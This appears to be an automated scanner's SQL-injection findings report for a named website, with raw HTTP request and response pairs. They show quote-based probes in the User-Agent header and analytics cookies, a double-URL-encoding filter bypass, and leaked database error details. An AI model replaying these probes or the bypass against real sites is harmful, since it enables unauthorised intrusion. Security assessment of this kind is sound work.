GET /index.php?option=com_chronocontact&task=send&chronoformname=gahelpnow&Itemid=70 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%00' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:48:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_chronocontact&task=send&chronoformname=gahelpnow&Itemid=70 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:48:59 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:49:02 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:49:02 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /index.php?option=com_jsetup&controller=comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527 Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:48:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_jsetup&controller=comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527%2527 Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:48:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA=&titleheader=[&format=html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)' Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D&titleheader=%5B Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:05:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA=&titleheader=[&format=html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'' Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D&titleheader=%5B Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:05:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:05:26 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:05:26 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /index.php?option=com_content&eid=Array&Itemid=66&itemid=70&format=html&id=90:analytics-toolbar&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/90-analytics-toolbar.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:46:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_content&eid=Array&Itemid=66&itemid=70&format=html&id=90:analytics-toolbar&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/90-analytics-toolbar.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:46:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /index.php?option=com_content&eid=Array&Itemid=75&itemid=70&format=html&id=106:google-analytics-health-check&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937'; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:01:08 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_content&eid=Array&Itemid=75&itemid=70&format=html&id=106:google-analytics-health-check&view=article&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937''; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:01:09 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:01:12 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:01:12 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26418
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /index.php?option=com_jsetup&controller=comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:37:03 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_jsetup&controller=comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:37:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:37:06 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:37:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 94178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /index.php?option=com_content&eid=Array&Itemid=85&format=html&view=article&catid=55:googleanalytics&id=117:campaign-tracking-with-google-analytics-email-banners-and-more&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:44:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_content&eid=Array&Itemid=85&format=html&view=article&catid=55:googleanalytics&id=117:campaign-tracking-with-google-analytics-email-banners-and-more&layout=default&commenttype=20 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:44:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:42:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; 